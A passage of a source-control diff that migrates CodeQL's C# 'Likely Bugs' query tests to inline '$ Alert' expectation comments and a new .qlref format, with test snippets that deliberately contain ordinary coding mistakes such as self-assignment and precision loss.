IReadOnlyList= 0; - b = 0 <= xs.Count; - b = 0 <= ys.Count; + b = xs.Count >= 0; // $ Alert + b = 0 <= xs.Count; // $ Alert + b = 0 <= ys.Count; // $ Alert - b = xs.Count < 0; - b = ys.Count < 0; - b = 0 > xs.Count; + b = xs.Count < 0; // $ Alert + b = ys.Count < 0; // $ Alert + b = 0 > xs.Count; // $ Alert return b; } @@ -158,6 +158,6 @@ static bool ReadOnlyCollection(IReadOnlyCollection xs, IReadOnlyList c) { Debug.Assert(c.Count >= 0); // OK - return c.Count >= 0; // NOT OK + return c.Count >= 0; // NOT OK // $ Alert } } diff --git a/csharp/ql/test/query-tests/Likely Bugs/Collections/ContainerSizeCmpZero/ContainerSizeCmpZero.qlref b/csharp/ql/test/query-tests/Likely Bugs/Collections/ContainerSizeCmpZero/ContainerSizeCmpZero.qlref index 17c0434a3a81..92952b25bdb6 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/Collections/ContainerSizeCmpZero/ContainerSizeCmpZero.qlref +++ b/csharp/ql/test/query-tests/Likely Bugs/Collections/ContainerSizeCmpZero/ContainerSizeCmpZero.qlref @@ -1 +1,2 @@ -Likely Bugs/Collections/ContainerSizeCmpZero.ql \ No newline at end of file +query: Likely Bugs/Collections/ContainerSizeCmpZero.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Likely Bugs/DangerousNonShortCircuitLogic/DangerousNonShortCircuitLogic.cs b/csharp/ql/test/query-tests/Likely Bugs/DangerousNonShortCircuitLogic/DangerousNonShortCircuitLogic.cs index 0d10e11b7f63..40a1a3766926 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/DangerousNonShortCircuitLogic/DangerousNonShortCircuitLogic.cs +++ b/csharp/ql/test/query-tests/Likely Bugs/DangerousNonShortCircuitLogic/DangerousNonShortCircuitLogic.cs @@ -12,10 +12,10 @@ void M() if (c != null ^ this.Field > 0) ; // GOOD if (c != null && c.Field > 0) ; // GOOD - if (c != null & c.Field > 0) ; // BAD - if (c == null | c.Property == "") ; // BAD - if (c == null | c[0]) ; // BAD - if (c == null | c.Method()) ; // BAD + if (c != null & c.Field > 0) ; // BAD // $ Alert + if (c == null | c.Property == "") ; // BAD // $ Alert + if (c == null | c[0]) ; // BAD // $ Alert + if (c == null | c.Method()) ; // BAD // $ Alert var b = true; b &= c.Method(); // GOOD diff --git a/csharp/ql/test/query-tests/Likely Bugs/DangerousNonShortCircuitLogic/DangerousNonShortCircuitLogic.qlref b/csharp/ql/test/query-tests/Likely Bugs/DangerousNonShortCircuitLogic/DangerousNonShortCircuitLogic.qlref index 6e192b5b73f1..c150d5b2bd61 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/DangerousNonShortCircuitLogic/DangerousNonShortCircuitLogic.qlref +++ b/csharp/ql/test/query-tests/Likely Bugs/DangerousNonShortCircuitLogic/DangerousNonShortCircuitLogic.qlref @@ -1 +1,2 @@ -Likely Bugs/DangerousNonShortCircuitLogic.ql \ No newline at end of file +query: Likely Bugs/DangerousNonShortCircuitLogic.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Likely Bugs/Dynamic/BadDynamicCall.qlref b/csharp/ql/test/query-tests/Likely Bugs/Dynamic/BadDynamicCall.qlref index e9490e9041ad..60268eb9d750 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/Dynamic/BadDynamicCall.qlref +++ b/csharp/ql/test/query-tests/Likely Bugs/Dynamic/BadDynamicCall.qlref @@ -1 +1,2 @@ -Likely Bugs/Dynamic/BadDynamicCall.ql \ No newline at end of file +query: Likely Bugs/Dynamic/BadDynamicCall.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Likely Bugs/Dynamic/dynamic.cs b/csharp/ql/test/query-tests/Likely Bugs/Dynamic/dynamic.cs index 66626400b902..06f18e05320f 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/Dynamic/dynamic.cs +++ b/csharp/ql/test/query-tests/Likely Bugs/Dynamic/dynamic.cs @@ -43,17 +43,17 @@ void TestCall() x.M5(1, new string[1]); // These are BAD: - x.M1(1); - x.M2(); - x.M2("", 1); - x.M2(1, "", 2.0); - x.M3(); - x.M3(1, 2, 3, 4); - x.M4(); - x.M4(1, 2); - x.M4(""); - x.M4(1, new object[1]); - x.M6(); + x.M1(1); // $ Alert + x.M2(); // $ Alert + x.M2("", 1); // $ Alert + x.M2(1, "", 2.0); // $ Alert + x.M3(); // $ Alert + x.M3(1, 2, 3, 4); // $ Alert + x.M4(); // $ Alert + x.M4(1, 2); // $ Alert + x.M4(""); // $ Alert + x.M4(1, new object[1]); // $ Alert + x.M6(); // $ Alert // These are GOOD: x.M7(2); @@ -61,8 +61,8 @@ void TestCall() x.M5(1, new string[] { "abc" }, new string[] { "def" }); // These are BAD: - x.M7(2, "abc"); - x.M8(1, new string[] { "abc" }, new string[] { "def" }); + x.M7(2, "abc"); // $ Alert + x.M8(1, new string[] { "abc" }, new string[] { "def" }); // $ Alert // These are GOOD: if ("" + "" == "") ; @@ -73,7 +73,7 @@ void TestCall() d -= 10; // These are BAD: - x = x + x; + x = x + x; // $ Alert // These are GOOD: dynamic d2 = GetI(); @@ -81,7 +81,7 @@ void TestCall() // These are BAD: dynamic d3 = GetI(); - d3.M(); + d3.M(); // $ Alert // These are GOOD dynamic d4 = ""; diff --git a/csharp/ql/test/query-tests/Likely Bugs/EqualsArray/EqualsArray.cs b/csharp/ql/test/query-tests/Likely Bugs/EqualsArray/EqualsArray.cs index dba87ee0450c..1639ee8f8445 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/EqualsArray/EqualsArray.cs +++ b/csharp/ql/test/query-tests/Likely Bugs/EqualsArray/EqualsArray.cs @@ -8,7 +8,7 @@ public class Test // NOT OK public bool AreTheseMyNumbers(int[] numbers) { - return this.numbers.Equals(numbers); + return this.numbers.Equals(numbers); // $ Alert } // OK @@ -20,13 +20,13 @@ public bool HonestAreTheseMyNumbers(int[] numbers) // NOT OK (string is also IEnumerable) public bool Incomparable(string s) { - return numbers.Equals(s); + return numbers.Equals(s); // $ Alert } // NOT OK public bool CollectionEquals(IEnumerable c1) { - return c1.Equals(c1); + return c1.Equals(c1); // $ Alert } class CollectionImplementingIEnumerable1 : IEnumerable @@ -84,7 +84,7 @@ public override bool Equals(object other) // NOT OK: Nothing overrides Equals() bool OverriddenEquals(CollectionImplementingIEnumerable1 c) { - return c.Equals(c); + return c.Equals(c); // $ Alert } // OK: ImplementEquals overrides Equals() diff --git a/csharp/ql/test/query-tests/Likely Bugs/EqualsArray/EqualsArray.qlref b/csharp/ql/test/query-tests/Likely Bugs/EqualsArray/EqualsArray.qlref index d96256b3b972..8e560893a1de 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/EqualsArray/EqualsArray.qlref +++ b/csharp/ql/test/query-tests/Likely Bugs/EqualsArray/EqualsArray.qlref @@ -1 +1,2 @@ -Likely Bugs/EqualsArray.ql \ No newline at end of file +query: Likely Bugs/EqualsArray.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Likely Bugs/EqualsUsesAs/EqualsUsesAs.cs b/csharp/ql/test/query-tests/Likely Bugs/EqualsUsesAs/EqualsUsesAs.cs index f50ada45a414..4a44b2ecbb86 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/EqualsUsesAs/EqualsUsesAs.cs +++ b/csharp/ql/test/query-tests/Likely Bugs/EqualsUsesAs/EqualsUsesAs.cs @@ -2,7 +2,7 @@ public class Test1 { public override bool Equals(object other) { - var otherTest = other as Test1; // BAD + var otherTest = other as Test1; // BAD // $ Alert return otherTest != null; } } diff --git a/csharp/ql/test/query-tests/Likely Bugs/EqualsUsesAs/EqualsUsesAs.qlref b/csharp/ql/test/query-tests/Likely Bugs/EqualsUsesAs/EqualsUsesAs.qlref index e3ec94efc2c9..269ea2e6e511 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/EqualsUsesAs/EqualsUsesAs.qlref +++ b/csharp/ql/test/query-tests/Likely Bugs/EqualsUsesAs/EqualsUsesAs.qlref @@ -1 +1,2 @@ -Likely Bugs/EqualsUsesAs.ql \ No newline at end of file +query: Likely Bugs/EqualsUsesAs.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Likely Bugs/EqualsUsesIs/EqualsUsesIs.cs b/csharp/ql/test/query-tests/Likely Bugs/EqualsUsesIs/EqualsUsesIs.cs index 6e1db1bd05a2..356042e53893 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/EqualsUsesIs/EqualsUsesIs.cs +++ b/csharp/ql/test/query-tests/Likely Bugs/EqualsUsesIs/EqualsUsesIs.cs @@ -2,7 +2,7 @@ public class Test1 { public override bool Equals(object other) { - return other is Test1; // BAD + return other is Test1; // BAD // $ Alert } } diff --git a/csharp/ql/test/query-tests/Likely Bugs/EqualsUsesIs/EqualsUsesIs.qlref b/csharp/ql/test/query-tests/Likely Bugs/EqualsUsesIs/EqualsUsesIs.qlref index 04003a637c0b..cbff9b573dd6 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/EqualsUsesIs/EqualsUsesIs.qlref +++ b/csharp/ql/test/query-tests/Likely Bugs/EqualsUsesIs/EqualsUsesIs.qlref @@ -1 +1,2 @@ -Likely Bugs/EqualsUsesIs.ql \ No newline at end of file +query: Likely Bugs/EqualsUsesIs.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Likely Bugs/IncomparableEquals/IncomparableEquals.cs b/csharp/ql/test/query-tests/Likely Bugs/IncomparableEquals/IncomparableEquals.cs index cb9c97e8aa93..bdf92b4546a9 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/IncomparableEquals/IncomparableEquals.cs +++ b/csharp/ql/test/query-tests/Likely Bugs/IncomparableEquals/IncomparableEquals.cs @@ -3,7 +3,7 @@ public class Test public bool M() { var x = new Test2(); - return this.Equals(x); // BAD + return this.Equals(x); // BAD // $ Alert } } diff --git a/csharp/ql/test/query-tests/Likely Bugs/IncomparableEquals/IncomparableEquals.qlref b/csharp/ql/test/query-tests/Likely Bugs/IncomparableEquals/IncomparableEquals.qlref index 96eae4e2eac5..91b47c6ddd94 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/IncomparableEquals/IncomparableEquals.qlref +++ b/csharp/ql/test/query-tests/Likely Bugs/IncomparableEquals/IncomparableEquals.qlref @@ -1 +1,2 @@ -Likely Bugs/IncomparableEquals.ql \ No newline at end of file +query: Likely Bugs/IncomparableEquals.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Likely Bugs/InconsistentCompareTo/InconsistentCompareTo.cs b/csharp/ql/test/query-tests/Likely Bugs/InconsistentCompareTo/InconsistentCompareTo.cs index b405dc09e1f2..78a9749afebb 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/InconsistentCompareTo/InconsistentCompareTo.cs +++ b/csharp/ql/test/query-tests/Likely Bugs/InconsistentCompareTo/InconsistentCompareTo.cs @@ -31,25 +31,25 @@ abstract class GoodComparableAbstract : IComparable public abstract int CompareTo(object other); } -class BadComparable : IComparable +class BadComparable : IComparable // $ Alert { public int CompareTo(object other) { return 0; } public override int GetHashCode() { return 0; } } -class BadComparableInt : IComparable +class BadComparableInt : IComparable // $ Alert { public int CompareTo(int x) { return 0; } public override int GetHashCode() { return 0; } } -class BadComparableT : IComparable +class BadComparableT : IComparable // $ Alert { public int CompareTo(T t) { return 0; } public override int GetHashCode() { return 0; } } -class BadComparableNewEquals : IComparable +class BadComparableNewEquals : IComparable // $ Alert { public int CompareTo(object other) { return 0; } public new bool Equals(object other) { return false; } diff --git a/csharp/ql/test/query-tests/Likely Bugs/InconsistentCompareTo/InconsistentCompareTo.qlref b/csharp/ql/test/query-tests/Likely Bugs/InconsistentCompareTo/InconsistentCompareTo.qlref index 5663237f6729..03552e829c86 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/InconsistentCompareTo/InconsistentCompareTo.qlref +++ b/csharp/ql/test/query-tests/Likely Bugs/InconsistentCompareTo/InconsistentCompareTo.qlref @@ -1 +1,2 @@ -Likely Bugs/InconsistentCompareTo.ql \ No newline at end of file +query: Likely Bugs/InconsistentCompareTo.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Likely Bugs/MishandlingJapaneseEra/MishandlingJapaneseEra.qlref b/csharp/ql/test/query-tests/Likely Bugs/MishandlingJapaneseEra/MishandlingJapaneseEra.qlref index cf11ec925453..791b603a2e9f 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/MishandlingJapaneseEra/MishandlingJapaneseEra.qlref +++ b/csharp/ql/test/query-tests/Likely Bugs/MishandlingJapaneseEra/MishandlingJapaneseEra.qlref @@ -1 +1,2 @@ -Likely Bugs/MishandlingJapaneseEra.ql \ No newline at end of file +query: Likely Bugs/MishandlingJapaneseEra.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Likely Bugs/MishandlingJapaneseEra/Program.cs b/csharp/ql/test/query-tests/Likely Bugs/MishandlingJapaneseEra/Program.cs index 561b093f2308..9412593929a1 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/MishandlingJapaneseEra/Program.cs +++ b/csharp/ql/test/query-tests/Likely Bugs/MishandlingJapaneseEra/Program.cs @@ -9,28 +9,28 @@ class Program static void Main(string[] args) { // BAD: hard-coded era start date - var henseiStart = new DateTime(1989, 1, 8); + var henseiStart = new DateTime(1989, 1, 8); // $ Alert // BAD: hard-coded era start dates, list - List listOfEraStart = new List { new DateTime(1989, 1, 8) }; + List listOfEraStart = new List { new DateTime(1989, 1, 8) }; // $ Alert // BAD: hardcoded era name string currentEra = "Heisei"; DateTimeOffset dateNow = DateTimeOffset.Now; - DateTimeOffset dateThisEra = new DateTimeOffset(1989, 1, 8, 0, 0, 0, 0, TimeSpan.Zero); + DateTimeOffset dateThisEra = new DateTimeOffset(1989, 1, 8, 0, 0, 0, 0, TimeSpan.Zero); // $ Alert CultureInfo japaneseCulture = CultureInfo.GetCultureInfo("ja-JP"); JapaneseCalendar jk = new JapaneseCalendar(); // BAD: datetime is created from constant year in the current era, and the result will change with era change - var datejkCurrentEra = jk.ToDateTime(32, 2, 1, 9, 9, 9, 9); + var datejkCurrentEra = jk.ToDateTime(32, 2, 1, 9, 9, 9, 9); // $ Alert Console.WriteLine("Date for datejkCurrentEra {0} and year {1}", datejkCurrentEra.ToString(japaneseCulture), jk.GetYear (datejkCurrentEra)); // BAD: datetime is created from constant year in the current era, and the result will change with era change - var datejk = jk.ToDateTime(32, 2, 1, 9, 9, 9, 9, 0); + var datejk = jk.ToDateTime(32, 2, 1, 9, 9, 9, 9, 0); // $ Alert Console.WriteLine("Date for jk {0} and year {1}", datejk.ToString(japaneseCulture), jk.GetYear (datejk)); // OK: datetime is created from constant year in the specific era, and the result will not change with era change @@ -46,7 +46,7 @@ static void Main(string[] args) Console.WriteLine("Which converts to year {0}", realYear); // BAD: creating DateTime using specified Japanese era date. This may yield a different date when era changes - DateTime val = new DateTime(32, 2, 1, new JapaneseCalendar()); + DateTime val = new DateTime(32, 2, 1, new JapaneseCalendar()); // $ Alert Console.WriteLine("DateTime from constructor {0}", val); // OK: variable data for Year, not necessarily hard-coded and can come from adjusted source diff --git a/csharp/ql/test/query-tests/Likely Bugs/NestedLoopsSameVariable/NestedLoopsSameVariable.cs b/csharp/ql/test/query-tests/Likely Bugs/NestedLoopsSameVariable/NestedLoopsSameVariable.cs index cd01795f202b..8dc1062d15b7 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/NestedLoopsSameVariable/NestedLoopsSameVariable.cs +++ b/csharp/ql/test/query-tests/Likely Bugs/NestedLoopsSameVariable/NestedLoopsSameVariable.cs @@ -6,7 +6,7 @@ static void Main(string[] args) { for (int i = 0; i < 2; i++) { - for (int j = 0; j < 2; i++) + for (int j = 0; j < 2; i++) // $ Alert { Console.WriteLine(i + " " + j); } diff --git a/csharp/ql/test/query-tests/Likely Bugs/NestedLoopsSameVariable/NestedLoopsSameVariable.qlref b/csharp/ql/test/query-tests/Likely Bugs/NestedLoopsSameVariable/NestedLoopsSameVariable.qlref index c28b56d296d0..1e4470543922 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/NestedLoopsSameVariable/NestedLoopsSameVariable.qlref +++ b/csharp/ql/test/query-tests/Likely Bugs/NestedLoopsSameVariable/NestedLoopsSameVariable.qlref @@ -1 +1,2 @@ -Likely Bugs/NestedLoopsSameVariable.ql \ No newline at end of file +query: Likely Bugs/NestedLoopsSameVariable.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Likely Bugs/NestedLoopsSameVariable/Test.cs b/csharp/ql/test/query-tests/Likely Bugs/NestedLoopsSameVariable/Test.cs index 7b08cd2c9145..671ffccb1d07 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/NestedLoopsSameVariable/Test.cs +++ b/csharp/ql/test/query-tests/Likely Bugs/NestedLoopsSameVariable/Test.cs @@ -19,7 +19,7 @@ void DifferentCondition1() for (int i=0; i<10; ++i) { // BAD: considered to be a different condition - for (; 10>i; ++i) + for (; 10>i; ++i) // $ Alert { Console.WriteLine(i); } @@ -31,7 +31,7 @@ void DifferentCondition2() for (int i=0; i<10; ++i) { // BAD: different condition - for (; i<9; ++i) + for (; i<9; ++i) // $ Alert { Console.WriteLine(i); } @@ -43,7 +43,7 @@ void DifferentConditions3() for (int i=0; i<10; ++i) { // BAD: different condition - for (; i<=10; ++i) + for (; i<=10; ++i) // $ Alert { Console.WriteLine(i); } @@ -54,7 +54,7 @@ void UseAfterInnerLoop() { for (int i=0; i<10; ++i) { - for (; i<10; ++i) + for (; i<10; ++i) // $ Alert { } diff --git a/csharp/ql/test/query-tests/Likely Bugs/ObjectComparison/ObjectComparison.cs b/csharp/ql/test/query-tests/Likely Bugs/ObjectComparison/ObjectComparison.cs index 2774b9229fb9..ec8284a7f91b 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/ObjectComparison/ObjectComparison.cs +++ b/csharp/ql/test/query-tests/Likely Bugs/ObjectComparison/ObjectComparison.cs @@ -13,10 +13,10 @@ void M() ObjectComparisonTest y = new ObjectComparisonTest(); var b = x == y; // GOOD: but still reference equality - b = (object)x == y; // BAD - b = x == (object)y; // BAD - b = (I)x == y; // BAD - b = x == (I)y; // BAD + b = (object)x == y; // BAD // $ Alert + b = x == (object)y; // BAD // $ Alert + b = (I)x == y; // BAD // $ Alert + b = x == (I)y; // BAD // $ Alert b = (object)x == Field1; // GOOD b = Field1 == (object)x; // GOOD diff --git a/csharp/ql/test/query-tests/Likely Bugs/ObjectComparison/ObjectComparison.qlref b/csharp/ql/test/query-tests/Likely Bugs/ObjectComparison/ObjectComparison.qlref index 6f834d6d6548..e47228487204 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/ObjectComparison/ObjectComparison.qlref +++ b/csharp/ql/test/query-tests/Likely Bugs/ObjectComparison/ObjectComparison.qlref @@ -1 +1,2 @@ -Likely Bugs/ObjectComparison.ql \ No newline at end of file +query: Likely Bugs/ObjectComparison.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Likely Bugs/PossibleLossOfPrecision/PossibleLossOfPrecision.cs b/csharp/ql/test/query-tests/Likely Bugs/PossibleLossOfPrecision/PossibleLossOfPrecision.cs index 9a5cdc7c4901..639e914e4799 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/PossibleLossOfPrecision/PossibleLossOfPrecision.cs +++ b/csharp/ql/test/query-tests/Likely Bugs/PossibleLossOfPrecision/PossibleLossOfPrecision.cs @@ -11,18 +11,18 @@ static void main(string[] args) decimal dec; // These are BAD: - d = 1 / 2; - f = 1 / 2; - d = -1 / 2; - f = -2 / 3; - d = x / y; - f = x / y; - d = x / 2; - d = 4 / y; - d = 1.0 + 1 / 2; - d = 2.0 * (1 / 2); - d = 1 + 1 / 2 + 4 / 2; - d = 1 * (1 / 2); + d = 1 / 2; // $ Alert + f = 1 / 2; // $ Alert + d = -1 / 2; // $ Alert + f = -2 / 3; // $ Alert + d = x / y; // $ Alert + f = x / y; // $ Alert + d = x / 2; // $ Alert + d = 4 / y; // $ Alert + d = 1.0 + 1 / 2; // $ Alert + d = 2.0 * (1 / 2); // $ Alert + d = 1 + 1 / 2 + 4 / 2; // $ Alert + d = 1 * (1 / 2); // $ Alert // These are GOOD: d = 4 / 2; @@ -30,8 +30,8 @@ static void main(string[] args) i = 5 / 10; // These are BAD: - dec = 2 * i + 1; - dec = unchecked(int.MaxValue * int.MaxValue); + dec = 2 * i + 1; // $ Alert + dec = unchecked(int.MaxValue * int.MaxValue); // $ Alert // These are GOOD: dec = 2 * (uint)int.MaxValue - 1; diff --git a/csharp/ql/test/query-tests/Likely Bugs/PossibleLossOfPrecision/PossibleLossOfPrecision.qlref b/csharp/ql/test/query-tests/Likely Bugs/PossibleLossOfPrecision/PossibleLossOfPrecision.qlref index ecddf650e791..82a58e295a56 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/PossibleLossOfPrecision/PossibleLossOfPrecision.qlref +++ b/csharp/ql/test/query-tests/Likely Bugs/PossibleLossOfPrecision/PossibleLossOfPrecision.qlref @@ -1 +1,2 @@ -Likely Bugs/PossibleLossOfPrecision.ql \ No newline at end of file +query: Likely Bugs/PossibleLossOfPrecision.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Likely Bugs/RandomUsedOnce/RandomUsedOnce.cs b/csharp/ql/test/query-tests/Likely Bugs/RandomUsedOnce/RandomUsedOnce.cs index fac7c9135af2..ce4a42b268f6 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/RandomUsedOnce/RandomUsedOnce.cs +++ b/csharp/ql/test/query-tests/Likely Bugs/RandomUsedOnce/RandomUsedOnce.cs @@ -8,14 +8,14 @@ class RandomTest { void f() { - new Random().Next(); // BAD + new Random().Next(); // BAD // $ Alert byte[] buffer = new byte[10]; - new Random().NextBytes(buffer); // BAD + new Random().NextBytes(buffer); // BAD // $ Alert - new Random().NextDouble(); // BAD - new Random().Next(10); // BAD - new Random().Next(10, 20); // BAD + new Random().NextDouble(); // BAD // $ Alert + new Random().Next(10); // BAD // $ Alert + new Random().Next(10, 20); // BAD // $ Alert new Random().Equals(null); // GOOD } diff --git a/csharp/ql/test/query-tests/Likely Bugs/RandomUsedOnce/RandomUsedOnce.qlref b/csharp/ql/test/query-tests/Likely Bugs/RandomUsedOnce/RandomUsedOnce.qlref index bff453451145..f9bb6c3eeb50 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/RandomUsedOnce/RandomUsedOnce.qlref +++ b/csharp/ql/test/query-tests/Likely Bugs/RandomUsedOnce/RandomUsedOnce.qlref @@ -1 +1,2 @@ -Likely Bugs/RandomUsedOnce.ql \ No newline at end of file +query: Likely Bugs/RandomUsedOnce.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Likely Bugs/RecursiveEquals/RecursiveEquals.cs b/csharp/ql/test/query-tests/Likely Bugs/RecursiveEquals/RecursiveEquals.cs index 3182dc8430c3..f97b22ed2241 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/RecursiveEquals/RecursiveEquals.cs +++ b/csharp/ql/test/query-tests/Likely Bugs/RecursiveEquals/RecursiveEquals.cs @@ -6,7 +6,7 @@ class Bad public override bool Equals(object rhs) { if (rhs.GetType() != this.GetType()) return false; - return Equals(rhs); + return Equals(rhs); // $ Alert } public bool Equals(Bad rhs) diff --git a/csharp/ql/test/query-tests/Likely Bugs/RecursiveEquals/RecursiveEquals.qlref b/csharp/ql/test/query-tests/Likely Bugs/RecursiveEquals/RecursiveEquals.qlref index d78738e7f9d1..68a07bb347dd 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/RecursiveEquals/RecursiveEquals.qlref +++ b/csharp/ql/test/query-tests/Likely Bugs/RecursiveEquals/RecursiveEquals.qlref @@ -1 +1,2 @@ -Likely Bugs/RecursiveEquals.ql \ No newline at end of file +query: Likely Bugs/RecursiveEquals.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Likely Bugs/SelfAssignment/SelfAssignment.qlref b/csharp/ql/test/query-tests/Likely Bugs/SelfAssignment/SelfAssignment.qlref index 28778bdd1c8b..82f6d5d9682b 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/SelfAssignment/SelfAssignment.qlref +++ b/csharp/ql/test/query-tests/Likely Bugs/SelfAssignment/SelfAssignment.qlref @@ -1 +1,2 @@ -Likely Bugs/SelfAssignment.ql +query: Likely Bugs/SelfAssignment.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Likely Bugs/SelfAssignment/selfassigns.cs b/csharp/ql/test/query-tests/Likely Bugs/SelfAssignment/selfassigns.cs index 6d1387a5e1db..c65c39349b37 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/SelfAssignment/selfassigns.cs +++ b/csharp/ql/test/query-tests/Likely Bugs/SelfAssignment/selfassigns.cs @@ -70,17 +70,17 @@ public void OK(SelfAssigns obj, int x) public void NotOK(SelfAssigns obj, int y) { - this[4] = this[4]; - y = y; - obj.y = obj.y; - z = this.z; - this.z = z; - obj.Normal1 = obj.Normal1; - obj.Normal2 = obj.Normal2; - base.IntField = IntField; - this.BoolProp = base.BoolProp; - this.Self.Self.Self.StringProp = Self.Self.Self.StringProp; - intArray[1] = this.intArray[1 + 0]; + this[4] = this[4]; // $ Alert + y = y; // $ Alert + obj.y = obj.y; // $ Alert + z = this.z; // $ Alert + this.z = z; // $ Alert + obj.Normal1 = obj.Normal1; // $ Alert + obj.Normal2 = obj.Normal2; // $ Alert + base.IntField = IntField; // $ Alert + this.BoolProp = base.BoolProp; // $ Alert + this.Self.Self.Self.StringProp = Self.Self.Self.StringProp; // $ Alert + intArray[1] = this.intArray[1 + 0]; // $ Alert } enum Enum diff --git a/csharp/ql/test/query-tests/Likely Bugs/StaticFieldWrittenByInstance/StaticFieldWrittenByInstance.cs b/csharp/ql/test/query-tests/Likely Bugs/StaticFieldWrittenByInstance/StaticFieldWrittenByInstance.cs index 244a6b2fd156..2c2d20b2bb2d 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/StaticFieldWrittenByInstance/StaticFieldWrittenByInstance.cs +++ b/csharp/ql/test/query-tests/Likely Bugs/StaticFieldWrittenByInstance/StaticFieldWrittenByInstance.cs @@ -12,7 +12,7 @@ static StaticFields() StaticFields() { - staticField = 0; // BAD + staticField = 0; // BAD // $ Alert instanceField = 0; // OK } @@ -23,7 +23,7 @@ static void StaticTest() void InstanceTest() { - staticField = 0; // BAD + staticField = 0; // BAD // $ Alert instanceField = 0; // OK } @@ -40,7 +40,7 @@ object Prop { get { - return backingField ?? (backingField = new object()); // BAD + return backingField ?? (backingField = new object()); // BAD // $ Alert } } } diff --git a/csharp/ql/test/query-tests/Likely Bugs/StaticFieldWrittenByInstance/StaticFieldWrittenByInstance.qlref b/csharp/ql/test/query-tests/Likely Bugs/StaticFieldWrittenByInstance/StaticFieldWrittenByInstance.qlref index 6c3a7cc48249..62a3ba9ac281 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/StaticFieldWrittenByInstance/StaticFieldWrittenByInstance.qlref +++ b/csharp/ql/test/query-tests/Likely Bugs/StaticFieldWrittenByInstance/StaticFieldWrittenByInstance.qlref @@ -1 +1,2 @@ -Likely Bugs/StaticFieldWrittenByInstance.ql +query: Likely Bugs/StaticFieldWrittenByInstance.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Likely Bugs/StringBuilderCharInit/StringBufferCharInit.qlref b/csharp/ql/test/query-tests/Likely Bugs/StringBuilderCharInit/StringBufferCharInit.qlref index 8d6feb01896b..10a4fb9ee8e3 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/StringBuilderCharInit/StringBufferCharInit.qlref +++ b/csharp/ql/test/query-tests/Likely Bugs/StringBuilderCharInit/StringBufferCharInit.qlref @@ -1 +1,2 @@ -Likely Bugs/StringBuilderCharInit.ql \ No newline at end of file +query: Likely Bugs/StringBuilderCharInit.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Likely Bugs/StringBuilderCharInit/StringBuilderCharInit.cs b/csharp/ql/test/query-tests/Likely Bugs/StringBuilderCharInit/StringBuilderCharInit.cs index 256199df1776..8a423244af48 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/StringBuilderCharInit/StringBuilderCharInit.cs +++ b/csharp/ql/test/query-tests/Likely Bugs/StringBuilderCharInit/StringBuilderCharInit.cs @@ -6,14 +6,14 @@ static void Main() { new StringBuilder(); new StringBuilder(12); - new StringBuilder('a'); // BAD + new StringBuilder('a'); // BAD // $ Alert new StringBuilder(3, 4); - new StringBuilder(3, 'a'); // BAD - new StringBuilder('a', 'b'); // BAD + new StringBuilder(3, 'a'); // BAD // $ Alert + new StringBuilder('a', 'b'); // BAD // $ Alert new StringBuilder(""); new StringBuilder("", 12); - new StringBuilder("", 'a'); // BAD + new StringBuilder("", 'a'); // BAD // $ Alert new StringBuilder("abc", 1, 1, 12); - new StringBuilder("abc", 1, 1, 'a'); // BAD + new StringBuilder("abc", 1, 1, 'a'); // BAD // $ Alert } } diff --git a/csharp/ql/test/query-tests/Likely Bugs/ThreadUnsafeICryptoTransform/ThreadUnsafeICryptoTransform.cs 